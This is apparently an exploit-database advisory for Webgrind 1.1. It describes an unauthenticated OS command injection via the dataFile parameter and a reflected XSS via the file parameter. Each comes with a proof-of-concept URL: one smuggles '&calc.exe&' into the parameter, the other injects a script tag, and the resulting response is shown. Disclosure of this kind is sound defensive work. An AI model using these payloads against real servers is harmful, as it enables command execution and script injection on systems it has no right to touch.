Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)

vendor:

Webgrind

by:

Rafael Pedrero

7.5

CVSS

HIGH

Remote Command Execution (RCE), reflected Cross-Site Scripting (XSS)

434, 79

CWE

Product Name: Webgrind

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 using XAMPP

2022

Webgrind 1.1 – Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)

Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allow remote unauthenticated attackers to inject OS commands via /<webgrind_path_directory>/index.php in dataFile parameter. Reflected Cross-Site Scripting (XSS) vulnerability in Webgrind v1.1 and before, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the /<webgrind_path_directory>/index.php, in file parameter.

Mitigation:

Apply the latest patch or upgrade to a fixed version of Webgrind. Validate and sanitize user-controlled inputs to prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://github.com/jokkedk/webgrind/
# Software Link : http://github.com/jokkedk/webgrind/
# Tested Version: 1.1
# Tested on:  Windows 10 using XAMPP

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434

Vulnerability description: Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allow remote unauthenticated attackers to inject OS commands via /<webgrind_path_directory>/index.php in dataFile parameter.

Proof of concept:

http://localhost/tools/webgrind/index.php?dataFile=0%27%26calc.exe%26%27&showFraction=0.9&op=function_graph

And the calc.exe opens.

Note: 0'&calc.exe&', & char is neccesary to execute the command.


# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Webgrind v1.1 and before, does not sufficiently
encode user-controlled inputs, resulting in a reflected Cross-Site
Scripting (XSS) vulnerability via the /<webgrind_path_directory>/index.php,
in file parameter.

Proof of concept:

http://localhost/webgrind/index.php?op=fileviewer&file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E

Response:
...
<title>
webgrind - fileviewer: </title><script>alert(1);</script><title> </title>
<script type="text/javascript" charset="utf-8">